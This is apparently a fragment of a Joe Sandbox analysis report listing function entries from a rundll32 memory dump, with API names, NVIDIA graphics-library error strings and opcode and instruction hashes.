                                                                                                                                  • Opcode Fuzzy Hash: 25b3f02b4c43d9b760aa53d465be3eafec4f552b3dd47f5ff796ec9f328cbd36
                                                                                                                                  • Instruction Fuzzy Hash: B981D368F0AB4384FA70DFD5B8B833022ACBF44745F851139D80DA6AA4EFBDA454A304
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseHandle
                                                                                                                                  • String ID: %s - CreateFormatConverter failed with %x error,$/tEXt/Software$After WriteSource$Before WriteSource$CNvWICImageTranscoder::performImageTransform$CreateDecoderFromFilename failed with %x error$CreateImageEncoder failed with %x error, returning error$Exit performImageTransform$GEFORCE SHARE$GetColorContexts failed with %x error$GetContainerFormat returned GUID for input image- {%08lX-%04hX-%04hX-%02hhX%02hhX-%02hhX%02hhX%02hhX%02hhX%02hhX%02hhX} for Frame:$GetSize on the decoder object failed with %x error$No input file specified$Not initialized$Unable to copy color contexts failed with %x error$WriteFrame failed with %x error, returning error$m_pEncoder CreateNewFrame failed with %x error$pBitmapFrameEncode->Commit failed with %x error$pBitmapFrameEncode->GetMetadataQueryWriter failed with %x error$pBitmapFrameEncode->Initialize failed with %x error$pBitmapFrameEncode->WriteSource failed with %x error
                                                                                                                                  • API String ID: 2962429428-1590170930
                                                                                                                                  • Opcode ID: 005ad0afa0922d8bc952165cfca8e1ebcd2e45498096374236a38b6566c5fa4a
                                                                                                                                  • Instruction ID: 284f9a3d6af375c6077d59b130e5b5cd1da6aaf8f678ef3151d079029d2b500c
                                                                                                                                  • Opcode Fuzzy Hash: 005ad0afa0922d8bc952165cfca8e1ebcd2e45498096374236a38b6566c5fa4a
                                                                                                                                  • Instruction Fuzzy Hash: 15825936B04B468AFB30CFAAD8A02A937A4FB48B89F114136CE4D57B64DF79E544D740
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CapsDevice$DesktopWindow
                                                                                                                                  • String ID: %s - CreateBitmapFromMemory failed with %x error,$%s - CreateBitmapFromSource failed with %x error,$%s - CreateBitmapFromWicBitmap failed with %x error$%s - CreateFormatConverter failed with %x error,$%s - CreateSolidColorBrush failed with %x error$%s - Invalid %x bufferType passed$%s - Invalid wic bitmap passed,$%s - Null or invalid props pointer passed$%s - Total bitmaps to blend together - %d more than 10, resetting to 10$%s- CreateDecoderFromFilename for %s fileName failed with %x error$CNVDirectBlend::getCompositeBitmapFromFileName$CNVDirectBlend::getCompositeBitmapFromFileName$CNVDirectBlend::getD2DBitmap$CreateBitmap failed with %x error$CreateBitmapFromWicBitmap failed with %x error$EndDraw failed with %x error$GetSize on the decoder object failed with %x error$IWICBitmapDecoder::GetFrame failed with %x error$blendEffect->SetValue failed with %x error$getAlphaBitmapFromFileName failed with %x error
                                                                                                                                  • API String ID: 1096970582-137455257
                                                                                                                                  • Opcode ID: e1691c2ccba2f6f4a61cf13629da8745651c466fd281e4823b12a2b796bad9bf
                                                                                                                                  • Instruction ID: a925f2043c6b8156c1eeb88701753a49e27a93046077e242e02bd3eee9e1c506
                                                                                                                                  • Opcode Fuzzy Hash: e1691c2ccba2f6f4a61cf13629da8745651c466fd281e4823b12a2b796bad9bf
                                                                                                                                  • Instruction Fuzzy Hash: 6E338936B09B4586FB20CFAAD4A02AD77A0FB88B89F144536DE4D27B64CF79E441D740
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DebugOutputString$AddressProc$DirectoryErrorLastLocalSystem$AllocFreeLibraryLoad
                                                                                                                                  • String ID: *** Error: $*** Signature override detected...$*** WARNING - PE SIGNATURE VERIFICATION FAILED !!!*** Filename: $Advapi32.dll$Ole32.dll$RegCloseKey$RegEnumValueW$RegOpenKeyExW$SOFTWARE\NVIDIA Corporation\Global$StringFromGUID2
                                                                                                                                  • API String ID: 2490301347-1438071108
                                                                                                                                  • Opcode ID: 1d6b9df3eebe2aa38a0ebf8ac068eb6c25e5af42a1da8503f22a176f1522249a
                                                                                                                                  • Instruction ID: 9c1d1193f740434b42e152ea01ac90ca7b30c39ee7e795c45cb201faf2abb773
                                                                                                                                  • Opcode Fuzzy Hash: 1d6b9df3eebe2aa38a0ebf8ac068eb6c25e5af42a1da8503f22a176f1522249a
                                                                                                                                  • Instruction Fuzzy Hash: 7BD18125B09B8386FB249FA5E8A02B973A8FF48755F440139DE4EA3664DF7CE445D700
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateDirectoryFreeLibrary
                                                                                                                                  • String ID: $%d.%d.%d$%u.%u.%u$.dll$C:\dvs\p4\build\sw\devrel\libdev\NGX\core\r1.2\source\api\nvsdk_ngx_common.cpp$Fallback snippet '%S' missing or corrupted - last error %S$NGXSecureLoadFeature$\nvngx_$\nvngx_config.txt$app %llX feature %S snippet: %S$app_$app_%07llX$warning: skipping downloaded snippet due to lower version %d.%d.%d < %d.%d.%d
                                                                                                                                  • API String ID: 3196203574-130269148
                                                                                                                                  • Opcode ID: e9f055d2c8ab49e8c2135653ee8cf23de3578d4b003e5cf818e5647b115275bf
                                                                                                                                  • Instruction ID: 5cf7a9ef374d128aca8aef3a6b09aada8725e3f928fad15347aa3947f9aaced8
                                                                                                                                  • Opcode Fuzzy Hash: e9f055d2c8ab49e8c2135653ee8cf23de3578d4b003e5cf818e5647b115275bf
                                                                                                                                  • Instruction Fuzzy Hash: F5228E32B08B4685FB20DFA1E8A02EA77A5FB44789F405136DA4D17BA8DF7DE505C780
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressLocalProc$AllocErrorLast$Free$AttributesConditionFileInfoMaskVerifyVersion
                                                                                                                                  • String ID: $SetupDiDestroyDeviceInfoList$SetupDiGetDevicePropertyW$SetupGetInfDriverStoreLocationW$Setupapi.dll
                                                                                                                                  • API String ID: 479516965-2442375720
                                                                                                                                  • Opcode ID: 0e7f3fc1ebfef63b9e8befe8db0f7b3ef450d689d6004afb69a9e041b426c530
                                                                                                                                  • Instruction ID: b26c98112448e896520fd2d6ce16cde865e0a24998f2b4a330564be0dd6913b0
                                                                                                                                  • Opcode Fuzzy Hash: 0e7f3fc1ebfef63b9e8befe8db0f7b3ef450d689d6004afb69a9e041b426c530
                                                                                                                                  • Instruction Fuzzy Hash: 75A17E72B09B4286FB74CFA5A8A427A63A9BF48785F440139D94D97BA4EF7DE404C700
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: memcpy_s
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1502251526-3916222277
                                                                                                                                  • Opcode ID: 674a90a14dc20a0a4fe1c71672004b2fd67f2de7c674e57dfd894192e2cfb7cc
                                                                                                                                  • Instruction ID: 8679134ffda898324e2fe3578ad54bdef2b0f0da66f3d73d5388a4c0cc2902ef
                                                                                                                                  • Opcode Fuzzy Hash: 674a90a14dc20a0a4fe1c71672004b2fd67f2de7c674e57dfd894192e2cfb7cc
                                                                                                                                  • Instruction Fuzzy Hash: 61032876B085928BF775CEA6D460BF93795FB8478DF001235DA0A57B88DB78EA04CB40
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: %hs:Height Value passed in JSON not a Number$%hs:Invalid timesstamp %ls value detected in input json$%hs:Json not configured with output params, returning error$%hs:No valid input file passed, returning error$%hs:Width Value passed in JSON not a Number$AAC$C:\dvs\p4\build\sw\tools\rapidjson\1.0.2\include\rapidjson/document.h$CNvJsonMontageConfig::GetOutputParams$GIF$H264$IsObject()$audioChannels$audioCodec$bitsPerSample$duration$filename$fps$height$output$samplingRate$stereo$videoCodec$width
                                                                                                                                  • API String ID: 0-3742049291
                                                                                                                                  • Opcode ID: f68a74a92d9443b856d2b954d6d9bb68834472c632c67feb7962b2c14fc84be8
                                                                                                                                  • Instruction ID: 25fe1f90516747027615412abb021a8502443e071f7fd26dae845e448b4cb703
                                                                                                                                  • Opcode Fuzzy Hash: f68a74a92d9443b856d2b954d6d9bb68834472c632c67feb7962b2c14fc84be8
                                                                                                                                  • Instruction Fuzzy Hash: 1B62B672B1868282FE20DF94E4A42BE7361FB81795F402235EA9E17AD5DFBCE145C740
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Local$ConditionMask$Free$AllocFullInfoNamePathVerifyVersion$AddressProc
                                                                                                                                  • String ID: $$&$*$SHGetFolderPathW$Shell32.dll
                                                                                                                                  • API String ID: 4287201591-2843092907
                                                                                                                                  • Opcode ID: 0d21c32348157cc0ab237aa4f896f8d6952255a1767e61a319935305476e1cf3
                                                                                                                                  • Instruction ID: 0efa6d0d34119eb9bad219ed8d43509560f5c4f15b159ff69f0be99ed55dbab4
                                                                                                                                  • Opcode Fuzzy Hash: 0d21c32348157cc0ab237aa4f896f8d6952255a1767e61a319935305476e1cf3
                                                                                                                                  • Instruction Fuzzy Hash: E571D1A5B0978282FB30CF91B9A42B523A9FF45B91F444238C91E97B94EF7DE401D740
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4587767702.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _invoke_watson$Locale$SleepUpdateUpdate::___updatetlocinfo__updatetmbcinfo_getptd_malloc_crtmalloc
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3294838543-0
                                                                                                                                  • Opcode ID: 521078f5cd82ac0f084921f5033d007348db3b2902225dc428b05784ca17b11c
                                                                                                                                  • Instruction ID: 084eb429915106ff2183acdcc5e5956807c1a06688872eada26f31bf39ac8827
                                                                                                                                  • Opcode Fuzzy Hash: 521078f5cd82ac0f084921f5033d007348db3b2902225dc428b05784ca17b11c
                                                                                                                                  • Instruction Fuzzy Hash: C8220332320A4882EBA7DA65E51A3EF2391F7497C4F45D126EF4E8E695DF38D6098300
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressLocalProc$AllocDirectoryFreeSystem$LibraryLoad
                                                                                                                                  • String ID: SetupDiDestroyDeviceInfoList$SetupDiEnumDeviceInterfaces$SetupDiGetClassDevsW$SetupDiGetDeviceInterfaceDetailW$Setupapi.dll$VEN_10DE
                                                                                                                                  • API String ID: 3259344501-2772812945
                                                                                                                                  • Opcode ID: 7c644d129dc48527469084b3c10780ee942e85d54860aab42b046474c5722e56
                                                                                                                                  • Instruction ID: 3ab0591a65c5bd6e225ffc7273c6b3fa11600769368539a83bbbd86f669c09f4
                                                                                                                                  • Opcode Fuzzy Hash: 7c644d129dc48527469084b3c10780ee942e85d54860aab42b046474c5722e56
                                                                                                                                  • Instruction Fuzzy Hash: 7D915926B19B4286FB60CFA1B8743A833A9BB48789F445539DE4DA2B54EF3CE5149340
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateErrorEventLast
                                                                                                                                  • String ID: %s: Not able to create communication event, error - %x$%s: Not able to create done event, error - %x$%s: Not able to create initialize event, error - %x$%s: Not able to create pending event, error - %x$CNvVideoTranscode::InitializeForTranscode
                                                                                                                                  • API String ID: 545576003-2512211399
                                                                                                                                  • Opcode ID: 0d6106a9cdd94714d348079f01c4fa2d53b6e87335efbfb1ddaa6cc34244b657
                                                                                                                                  • Instruction ID: 72513e24892f2a3d2dd0c3d0a14655c06e10678f2a916c98cc96a7505dbbb1ae
                                                                                                                                  • Opcode Fuzzy Hash: 0d6106a9cdd94714d348079f01c4fa2d53b6e87335efbfb1ddaa6cc34244b657
                                                                                                                                  • Instruction Fuzzy Hash: 48B13836B05B429AFB74CFA4E4A02EC3379FF48749B405136DA5E53A68EE78E615C340
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Mutex$CloseCreateHandleObjectReleaseSingleWait
                                                                                                                                  • String ID: $%s=%s$C:\dvs\p4\build\sw\devrel\libdev\NGX\core\r1.2\source\api\nvsdk_ngx_common.cpp$NGXLoadConfig$[%s]$ngx_update_api
                                                                                                                                  • API String ID: 1910114929-880810353
                                                                                                                                  • Opcode ID: 075cdb4441c61e6bf80836c15d5a1196d102c34f28cb2f8047a233887277c383
                                                                                                                                  • Instruction ID: 170c55780edf5b47c0c3e17b59ed560eafe2a05e0f68696d039878402aea748d
                                                                                                                                  • Opcode Fuzzy Hash: 075cdb4441c61e6bf80836c15d5a1196d102c34f28cb2f8047a233887277c383
                                                                                                                                  • Instruction Fuzzy Hash: 3B429E32B09B4281FA24CF91E4A47B927A4FB84B85F59463AEE4E17B94DF7DE440D340
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: %s - Alpha bitmap not initialized, Possible end of all image params$%s - Alpha bitmap not ready for blend$%s - CreateBitmapFromWicBitmap failed with %x error$%s - CreateFormatConverter failed with %x error,$%s - Null BlendInfo struct passed$CNVDirectBlend::doBlend$CreateBitmap failed with %x error$EndDraw failed with %x error$Not able to create Wic Bitmap from pixel data, error - %x$W$blendEffect->SetValue failed with %x error$initializeAlphaBitmap failed with %x error$initializeAlphaBitmapForImageParams returned %x error - possibly image already handled
                                                                                                                                  • API String ID: 0-3293017823
                                                                                                                                  • Opcode ID: 6da85f80007a666535686e7fea357e1d663827dd3bed96efab637dae95e61e3d
                                                                                                                                  • Instruction ID: 0a719156c68fb080a04db1d66de0fe7cd1544887d493a6c1a809d81490b9ea34
                                                                                                                                  • Opcode Fuzzy Hash: 6da85f80007a666535686e7fea357e1d663827dd3bed96efab637dae95e61e3d
                                                                                                                                  • Instruction Fuzzy Hash: C7426B72B08B4686FB24CFA9D4A02AD23A5FB89B89F105136CE9D57B64CF7DE045D340
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: %hs: Not able to open input file - %ls, returning error$%hs:Couldnt load the json string - %ls into a Json object$%hs:Couldnt parse the json, Not a valid json file- %ls$%hs:FinalizeParams failed, error - %x, possibly memory allocation or inconsistent json file, returning error$%hs:GetExtendedParams failed, possibly wrong json or unsupported params, returning error$%hs:GetInputParams failed, possibly wrong or unsupported input params, returning error$%hs:GetOutputParams failed, possibly wrong or unsupported output params, returning error$%hs:Length of bytes read - %x not equal to length of the file- %x, might get parsing error$CNvJsonMontageConfig::parseConfigFileForMontageParams$GetSize() >= count * sizeof(T)$c:\dvs\p4\build\sw\tools\rapidjson\1.0.2\include\rapidjson\internal/stack.h
                                                                                                                                  • API String ID: 0-3493570970
                                                                                                                                  • Opcode ID: f4f6826c6d053448694c472d3d6097a3f538654ab3a059c9b4d163a941324ca2
                                                                                                                                  • Instruction ID: 9bcb832f4a51a188da78c61e5e34ff57a8d732328bce58bbd4f4e899bd4c3c6e
                                                                                                                                  • Opcode Fuzzy Hash: f4f6826c6d053448694c472d3d6097a3f538654ab3a059c9b4d163a941324ca2
                                                                                                                                  • Instruction Fuzzy Hash: 1B429E36B08B4681FA21DFA9D4A02B973A9FB84B85F54413ADE4D07B95DFBDE441C340
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: memcpy_s
                                                                                                                                  • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                  • API String ID: 1502251526-2761157908
                                                                                                                                  • Opcode ID: 34e11c9f84e5e463ac7eaf1eeb4a84143be7e7249a50f5aeb2146af9e4a983aa
                                                                                                                                  • Instruction ID: e085f874d4cf1ffdf4fda5d15b1111ccdc6b3676ca7c6936e5590aa442a05437
                                                                                                                                  • Opcode Fuzzy Hash: 34e11c9f84e5e463ac7eaf1eeb4a84143be7e7249a50f5aeb2146af9e4a983aa
                                                                                                                                  • Instruction Fuzzy Hash: BFB21972B081928BF7368EA6D4647FD37A1FB44799F105235DA0A57B88DFB8E5088B40
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: %s - Null Composition struct passed$%s - Size, Dest Buffer, width - %x, height - %x$%s - Size, First Buffer, width = %x, Height - %x, Second Buffer, width - %x, height - %x$%s - blendEffect->SetValue failed with %x error$CNVDirectBlend::doComposition$CreateBitmap failed with %x error$EndDraw failed with %x error$Not able to create D2D Bitmap from first buffer$Not able to create D2D Bitmap from second buffer$W
                                                                                                                                  • API String ID: 0-2924177856
                                                                                                                                  • Opcode ID: bccf47d484bdfb6e520c1373e29fc4e0be2e39b12ff9382d63a9be05228cfbde
                                                                                                                                  • Instruction ID: f400597b0eaed67dc17e99af344da1d90d4ab4e2c344a6b0b60edf0b251b6a16
                                                                                                                                  • Opcode Fuzzy Hash: bccf47d484bdfb6e520c1373e29fc4e0be2e39b12ff9382d63a9be05228cfbde
                                                                                                                                  • Instruction Fuzzy Hash: F2028C36B09B4582EB20DFAAE4A02A97374FB89B89F019136DF9D13B64DF79D404D700
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: %s - HandleBitmapOperation failed with %x error$%s: HandleSharedSurfaceBltForEncode failed for source surface from D2D bitmap, error - %x $%s: Invalid or Null ID2D1Bitmap1 ptr passed $%s: Not able to retrieve IDXGISurface from ID2D1Bitmap1$%s: Surface didnt return a QI to a ID3D11Texture2D surface $CNVMultiEncodeCompositor::HandleBlendForMultiVideoEncode$CNVMultiEncodeCompositor::HandleD2DBitmapBlt$yxxxxxxx
                                                                                                                                  • API String ID: 0-2934646955
                                                                                                                                  • Opcode ID: 964e0b20a05555755719c54e46e544a5fb14b9e9d4261dad1afb13305ffd8ad0
                                                                                                                                  • Instruction ID: 2c508e8be3edc7d6c8970eeeaad0da5e7b38ad8f74d02f218e89f87a02d15daf
                                                                                                                                  • Opcode Fuzzy Hash: 964e0b20a05555755719c54e46e544a5fb14b9e9d4261dad1afb13305ffd8ad0
                                                                                                                                  • Instruction Fuzzy Hash: 7F72AF66B08B8582EB20CF69D4943AD7764FB98BC8F019236DE8D177A5DF79E185C300
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Locale$CodeInfoPageValid$DefaultEnumLocalesProcessSystemUser
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2191266518-0
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: !HasParseError()$-$.$0$9$9$c:\dvs\p4\build\sw\tools\rapidjson\1.0.2\include\rapidjson\reader.h
                                                                                                                                  • API String ID: 0-3209311536
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: try_get_function
                                                                                                                                  • String ID: GetEnabledXStateFeatures$GetLocaleInfoEx
                                                                                                                                  • API String ID: 2742660187-3297707652
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                  • String ID: csm
                                                                                                                                  • API String ID: 2933794660-1018135373
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4587767702.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Mpunct$LockitLockit::_std::_
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 491317670-0
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4587767702.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Mpunct$LockitLockit::_std::_
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 491317670-0
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4587767702.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Mpunct$LockitLockit::_std::_
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 491317670-0
                                                                                                                                  • Opcode ID: 72a7ac2e2c1f111e1b61ae734374779d00f08ed685c08311d7ac3453d226d6ed
                                                                                                                                  • Instruction ID: 2589bcd918802237b5c990292f2751727b1abcad383ca43231b0e5c6f6b0472f
                                                                                                                                  • Opcode Fuzzy Hash: 72a7ac2e2c1f111e1b61ae734374779d00f08ed685c08311d7ac3453d226d6ed
                                                                                                                                  • Instruction Fuzzy Hash: 93324E72A04BC885EB678F25C4503ED6761F399BC8F54C112EA8D57BAADF39C689C340
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: %s - Null BlendInfo struct passed or not enough bitmaps passed$%s- CreateBitmap failed with %x error$CNVDirectBlend::doMultiBlend$EndDraw failed with %x error$blendEffect->SetValue failed with %x error
                                                                                                                                  • API String ID: 0-3199250351
                                                                                                                                  • Opcode ID: a2896140135b26fb250a8b78eea17674e9889428b40501cc1cab32bbba52f567
                                                                                                                                  • Instruction ID: fccdf5c8161865814da89acbdeb44b350219cd5816b7cec82869ac5ee68c222b
                                                                                                                                  • Opcode Fuzzy Hash: a2896140135b26fb250a8b78eea17674e9889428b40501cc1cab32bbba52f567
                                                                                                                                  • Instruction Fuzzy Hash: F9C17976B05A45CAEB20CFAAD4906EC3364FB88B89F019136DE5D17768CF3AE551D340
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4587767702.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: LockitLockit::_std::_$Mpunctlocaleconv
                                                                                                                                  • String ID: 0123456789ABCDEFabcdef-+XxPp
                                                                                                                                  • API String ID: 3643605086-3606100449
